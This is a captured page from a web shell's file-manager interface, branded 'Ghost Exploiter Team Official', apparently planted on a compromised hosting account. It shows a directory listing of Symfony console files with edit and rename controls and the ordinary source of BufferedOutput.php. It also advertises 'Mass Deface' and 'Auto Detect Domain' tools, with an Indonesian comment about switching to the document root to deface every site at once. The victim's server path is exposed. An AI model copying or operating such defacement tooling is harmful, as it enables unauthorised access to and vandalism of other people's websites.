webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
listing.aminikamanpower.com
/
vendor
/
symfony
/
console
/
Output
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BufferedOutput.php
0.821KB
edt
ren
ConsoleOutput.php
4.794KB
edt
ren
ConsoleOutputInterface.php
0.801KB
edt
ren
ConsoleSectionOutput.php
4.068KB
edt
ren
NullOutput.php
2.107KB
edt
ren
Output.php
4.432KB
edt
ren
OutputInterface.php
3.34KB
edt
ren
StreamOutput.php
3.766KB
edt
ren
TrimmedBufferOutput.php
1.546KB
edt
ren
error_log
44.191KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Console\Output; /** * @author Jean-François Simon <contact@jfsimon.fr> */ class BufferedOutput extends Output { private $buffer = ''; /** * Empties buffer and returns its content. * * @return string */ public function fetch() { $content = $this->buffer; $this->buffer = ''; return $content; } /** * {@inheritdoc} */ protected function doWrite($message, $newline) { $this->buffer .= $message; if ($newline) { $this->buffer .= \PHP_EOL; } } }